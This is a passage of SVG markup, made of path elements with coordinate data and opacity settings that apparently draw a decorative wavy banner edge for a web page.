.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n 